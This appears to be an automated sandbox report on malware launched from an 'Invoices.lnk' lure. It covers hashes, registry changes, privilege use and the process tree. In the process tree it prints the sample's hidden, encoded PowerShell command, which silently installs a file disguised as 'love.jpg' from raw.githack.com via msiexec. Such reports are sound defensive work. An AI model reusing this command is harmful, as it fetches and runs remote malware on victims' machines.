Analysis
-
max time kernel
31s -
max time network
75s -
platform
windows7_x64 -
resource
win7-20230703-en -
resource tags
arch:x64arch:x86image:win7-20230703-enlocale:en-usos:windows7-x64system -
submitted
10-07-2023 13:08
Static task
static1
Behavioral task
behavioral1
Sample
Invoices.lnk
Resource
win7-20230703-en
Behavioral task
behavioral2
Sample
Invoices.lnk
Resource
win10v2004-20230703-en
Behavioral task
behavioral3
Sample
Res/TVPSkin.dll
Resource
win7-20230703-en
Behavioral task
behavioral4
Sample
Res/TVPSkin.dll
Resource
win10v2004-20230703-en
Behavioral task
behavioral5
Sample
Res/hskin.dll
Resource
win7-20230703-en
Behavioral task
behavioral6
Sample
Res/hskin.dll
Resource
win10v2004-20230703-en
Behavioral task
behavioral7
Sample
Res/tvp.exe
Resource
win7-20230703-en
General
-
Target
Res/tvp.exe
-
Size
228KB
-
MD5
de2052aae5a5915d09d9d1ede714865c
-
SHA1
2161a471b598ea002fc2a1cc4b65dbb8da14a88e
-
SHA256
1d3f51b33070b5b8f11c891bb160f5f737151f3a36c2e24f96c2844b089a5294
-
SHA512
914eb403bc0662266e9b00f52da192463ae782c301be5279579fe88924451fa8b38a9cc9e689499ae7240259e7c03310980f06a5f7cd1b90bda0b3948fb5d1b3
-
SSDEEP
3072:0QUurm/I/Pc1fsrHxbGL+9QD2pkIanLqf0bAadkp2guonxKzjMMDE0BB6p2wkLqj:lRrXECWDianeuonmRankL
Malware Config
Signatures
-
Blocklisted process makes network request 3 IoCs
Processes:
msiexec.exeflow pid process 4 2704 msiexec.exe 6 2704 msiexec.exe 7 2704 msiexec.exe -
Use of msiexec (install) with remote resource 3 IoCs
Processes:
msiexec.exemsiexec.exemsiexec.exepid process 2124 msiexec.exe 2568 msiexec.exe 2420 msiexec.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Modifies registry class 10 IoCs
Processes:
tvp.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\totalplayer.file\shell\open\command tvp.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\totalplayer.file\shell\open tvp.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\totalplayer.file\shell\open\command\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Res\\tvp.exe %1" tvp.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\totalplayer.dvd\shell\open\command tvp.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\totalplayer.dvd\shell tvp.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\totalplayer.dvd\shell\open tvp.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\totalplayer.dvd\shell\open\command\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Res\\tvp.exe -dvd %1" tvp.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\totalplayer.file tvp.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\totalplayer.file\shell tvp.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\totalplayer.dvd tvp.exe -
Suspicious behavior: EnumeratesProcesses 9 IoCs
Processes:
PowerShell.exepowershell.exepowershell.exepowershell.exepid process 2984 PowerShell.exe 2984 PowerShell.exe 2984 PowerShell.exe 2984 PowerShell.exe 2984 PowerShell.exe 2984 PowerShell.exe 2872 powershell.exe 2936 powershell.exe 2040 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
PowerShell.exepowershell.exepowershell.exepowershell.exemsiexec.exemsiexec.exemsiexec.exemsiexec.exedescription pid process Token: SeDebugPrivilege 2984 PowerShell.exe Token: SeDebugPrivilege 2872 powershell.exe Token: SeDebugPrivilege 2936 powershell.exe Token: SeDebugPrivilege 2040 powershell.exe Token: SeShutdownPrivilege 2568 msiexec.exe Token: SeShutdownPrivilege 2124 msiexec.exe Token: SeIncreaseQuotaPrivilege 2568 msiexec.exe Token: SeIncreaseQuotaPrivilege 2124 msiexec.exe Token: SeShutdownPrivilege 2420 msiexec.exe Token: SeIncreaseQuotaPrivilege 2420 msiexec.exe Token: SeRestorePrivilege 2704 msiexec.exe Token: SeTakeOwnershipPrivilege 2704 msiexec.exe Token: SeSecurityPrivilege 2704 msiexec.exe Token: SeCreateTokenPrivilege 2568 msiexec.exe Token: SeAssignPrimaryTokenPrivilege 2568 msiexec.exe Token: SeLockMemoryPrivilege 2568 msiexec.exe Token: SeIncreaseQuotaPrivilege 2568 msiexec.exe Token: SeMachineAccountPrivilege 2568 msiexec.exe Token: SeTcbPrivilege 2568 msiexec.exe Token: SeSecurityPrivilege 2568 msiexec.exe Token: SeTakeOwnershipPrivilege 2568 msiexec.exe Token: SeLoadDriverPrivilege 2568 msiexec.exe Token: SeSystemProfilePrivilege 2568 msiexec.exe Token: SeSystemtimePrivilege 2568 msiexec.exe Token: SeProfSingleProcessPrivilege 2568 msiexec.exe Token: SeIncBasePriorityPrivilege 2568 msiexec.exe Token: SeCreatePagefilePrivilege 2568 msiexec.exe Token: SeCreatePermanentPrivilege 2568 msiexec.exe Token: SeBackupPrivilege 2568 msiexec.exe Token: SeRestorePrivilege 2568 msiexec.exe Token: SeShutdownPrivilege 2568 msiexec.exe Token: SeDebugPrivilege 2568 msiexec.exe Token: SeAuditPrivilege 2568 msiexec.exe Token: SeSystemEnvironmentPrivilege 2568 msiexec.exe Token: SeChangeNotifyPrivilege 2568 msiexec.exe Token: SeRemoteShutdownPrivilege 2568 msiexec.exe Token: SeUndockPrivilege 2568 msiexec.exe Token: SeSyncAgentPrivilege 2568 msiexec.exe Token: SeEnableDelegationPrivilege 2568 msiexec.exe Token: SeManageVolumePrivilege 2568 msiexec.exe Token: SeImpersonatePrivilege 2568 msiexec.exe Token: SeCreateGlobalPrivilege 2568 msiexec.exe Token: SeCreateTokenPrivilege 2420 msiexec.exe Token: SeAssignPrimaryTokenPrivilege 2420 msiexec.exe Token: SeLockMemoryPrivilege 2420 msiexec.exe Token: SeIncreaseQuotaPrivilege 2420 msiexec.exe Token: SeMachineAccountPrivilege 2420 msiexec.exe Token: SeTcbPrivilege 2420 msiexec.exe Token: SeSecurityPrivilege 2420 msiexec.exe Token: SeTakeOwnershipPrivilege 2420 msiexec.exe Token: SeLoadDriverPrivilege 2420 msiexec.exe Token: SeSystemProfilePrivilege 2420 msiexec.exe Token: SeSystemtimePrivilege 2420 msiexec.exe Token: SeProfSingleProcessPrivilege 2420 msiexec.exe Token: SeIncBasePriorityPrivilege 2420 msiexec.exe Token: SeCreatePagefilePrivilege 2420 msiexec.exe Token: SeCreatePermanentPrivilege 2420 msiexec.exe Token: SeBackupPrivilege 2420 msiexec.exe Token: SeRestorePrivilege 2420 msiexec.exe Token: SeShutdownPrivilege 2420 msiexec.exe Token: SeDebugPrivilege 2420 msiexec.exe Token: SeAuditPrivilege 2420 msiexec.exe Token: SeSystemEnvironmentPrivilege 2420 msiexec.exe Token: SeChangeNotifyPrivilege 2420 msiexec.exe -
Suspicious use of SetWindowsHookEx 3 IoCs
Processes:
tvp.exepid process 3048 tvp.exe 3048 tvp.exe 3048 tvp.exe -
Suspicious use of WriteProcessMemory 37 IoCs
Processes:
tvp.exePowerShell.exepowershell.exepowershell.exepowershell.exedescription pid process target process PID 3048 wrote to memory of 2984 3048 tvp.exe PowerShell.exe PID 3048 wrote to memory of 2984 3048 tvp.exe PowerShell.exe PID 3048 wrote to memory of 2984 3048 tvp.exe PowerShell.exe PID 3048 wrote to memory of 2984 3048 tvp.exe PowerShell.exe PID 2984 wrote to memory of 2872 2984 PowerShell.exe powershell.exe PID 2984 wrote to memory of 2872 2984 PowerShell.exe powershell.exe PID 2984 wrote to memory of 2872 2984 PowerShell.exe powershell.exe PID 2984 wrote to memory of 2872 2984 PowerShell.exe powershell.exe PID 2984 wrote to memory of 2936 2984 PowerShell.exe powershell.exe PID 2984 wrote to memory of 2936 2984 PowerShell.exe powershell.exe PID 2984 wrote to memory of 2936 2984 PowerShell.exe powershell.exe PID 2984 wrote to memory of 2936 2984 PowerShell.exe powershell.exe PID 2984 wrote to memory of 2040 2984 PowerShell.exe powershell.exe PID 2984 wrote to memory of 2040 2984 PowerShell.exe powershell.exe PID 2984 wrote to memory of 2040 2984 PowerShell.exe powershell.exe PID 2984 wrote to memory of 2040 2984 PowerShell.exe powershell.exe PID 2936 wrote to memory of 2124 2936 powershell.exe msiexec.exe PID 2936 wrote to memory of 2124 2936 powershell.exe msiexec.exe PID 2936 wrote to memory of 2124 2936 powershell.exe msiexec.exe PID 2936 wrote to memory of 2124 2936 powershell.exe msiexec.exe PID 2936 wrote to memory of 2124 2936 powershell.exe msiexec.exe PID 2936 wrote to memory of 2124 2936 powershell.exe msiexec.exe PID 2936 wrote to memory of 2124 2936 powershell.exe msiexec.exe PID 2040 wrote to memory of 2420 2040 powershell.exe msiexec.exe PID 2040 wrote to memory of 2420 2040 powershell.exe msiexec.exe PID 2040 wrote to memory of 2420 2040 powershell.exe msiexec.exe PID 2040 wrote to memory of 2420 2040 powershell.exe msiexec.exe PID 2040 wrote to memory of 2420 2040 powershell.exe msiexec.exe PID 2040 wrote to memory of 2420 2040 powershell.exe msiexec.exe PID 2040 wrote to memory of 2420 2040 powershell.exe msiexec.exe PID 2872 wrote to memory of 2568 2872 powershell.exe msiexec.exe PID 2872 wrote to memory of 2568 2872 powershell.exe msiexec.exe PID 2872 wrote to memory of 2568 2872 powershell.exe msiexec.exe PID 2872 wrote to memory of 2568 2872 powershell.exe msiexec.exe PID 2872 wrote to memory of 2568 2872 powershell.exe msiexec.exe PID 2872 wrote to memory of 2568 2872 powershell.exe msiexec.exe PID 2872 wrote to memory of 2568 2872 powershell.exe msiexec.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\Res\tvp.exe"C:\Users\Admin\AppData\Local\Temp\Res\tvp.exe"1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3048 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\PowerShell.exePowerShell -nop -exec bypass -w Hidden -Enc DQAKAGYAbwByACgAJABpAD0AMQA7ACQAaQAgAC0AbABlACAAMwA7ACQAaQArACsAKQANAAoAewANAAoAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAtAFYAZQByAGIAIAByAHUAbgBBAHMAIAAnAG0AcwBpAGUAeABlAGMAIAAvAGkAIABoAHQAdABwADoALwAvAHIAYQB3AC4AZwBpAHQAaABhAGMAawAuAGMAbwBtAC8AbQBuAHcATwBEAEIAcAB0AEsANgBqAFUALwA2ADIAOABmAHIAQQBMAHQAQQBjAG0ATwAvAG0AYQBpAG4ALwBsAG8AdgBlAC4AagBwAGcAIAAvAHEAJwANAAoAfQANAAoA2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2984 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" msiexec /i http://raw.githack.com/mnwODBptK6jU/628frALtAcmO/main/love.jpg /q3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2872 -
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\system32\msiexec.exe" /i http://raw.githack.com/mnwODBptK6jU/628frALtAcmO/main/love.jpg /q4⤵
- Use of msiexec (install) with remote resource
- Suspicious use of AdjustPrivilegeToken
PID:2568 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" msiexec /i http://raw.githack.com/mnwODBptK6jU/628frALtAcmO/main/love.jpg /q3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2936 -
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\system32\msiexec.exe" /i http://raw.githack.com/mnwODBptK6jU/628frALtAcmO/main/love.jpg /q4⤵
- Use of msiexec (install) with remote resource
- Suspicious use of AdjustPrivilegeToken
PID:2124 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" msiexec /i http://raw.githack.com/mnwODBptK6jU/628frALtAcmO/main/love.jpg /q3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2040 -
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\system32\msiexec.exe" /i http://raw.githack.com/mnwODBptK6jU/628frALtAcmO/main/love.jpg /q4⤵
- Use of msiexec (install) with remote resource
- Suspicious use of AdjustPrivilegeToken
PID:2420
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
- Blocklisted process makes network request
- Suspicious use of AdjustPrivilegeToken
PID:2704
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\VVZXYY6XNVG4UMGZK0FS.tempFilesize
7KB
MD5a55dfd39aaea78864b54062336cd1c6c
SHA18d94a26472d74f85f49271886562e874043d6a1c
SHA256a07366802e5c81022c531b5c8d3bb4e7d7b67b8f8e3a52b7b2a5443252ac3ba5
SHA512b7622be23fad02760d0de0c8200b442f219cfc11369d50e43d39975bdc40aa9e21ca94525854ed3a59fc1734c1ec71541569967ebbeeaaae75dcfb66ab9f0c37
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msFilesize
7KB
MD5a55dfd39aaea78864b54062336cd1c6c
SHA18d94a26472d74f85f49271886562e874043d6a1c
SHA256a07366802e5c81022c531b5c8d3bb4e7d7b67b8f8e3a52b7b2a5443252ac3ba5
SHA512b7622be23fad02760d0de0c8200b442f219cfc11369d50e43d39975bdc40aa9e21ca94525854ed3a59fc1734c1ec71541569967ebbeeaaae75dcfb66ab9f0c37
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msFilesize
7KB
MD5a55dfd39aaea78864b54062336cd1c6c
SHA18d94a26472d74f85f49271886562e874043d6a1c
SHA256a07366802e5c81022c531b5c8d3bb4e7d7b67b8f8e3a52b7b2a5443252ac3ba5
SHA512b7622be23fad02760d0de0c8200b442f219cfc11369d50e43d39975bdc40aa9e21ca94525854ed3a59fc1734c1ec71541569967ebbeeaaae75dcfb66ab9f0c37
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msFilesize
7KB
MD5a55dfd39aaea78864b54062336cd1c6c
SHA18d94a26472d74f85f49271886562e874043d6a1c
SHA256a07366802e5c81022c531b5c8d3bb4e7d7b67b8f8e3a52b7b2a5443252ac3ba5
SHA512b7622be23fad02760d0de0c8200b442f219cfc11369d50e43d39975bdc40aa9e21ca94525854ed3a59fc1734c1ec71541569967ebbeeaaae75dcfb66ab9f0c37
-
memory/2936-71-0x0000000002780000-0x00000000027C0000-memory.dmpFilesize
256KB
-
memory/2984-58-0x0000000002710000-0x0000000002750000-memory.dmpFilesize
256KB
-
memory/2984-59-0x0000000002710000-0x0000000002750000-memory.dmpFilesize
256KB
-
memory/3048-54-0x0000000000020000-0x000000000003F000-memory.dmpFilesize
124KB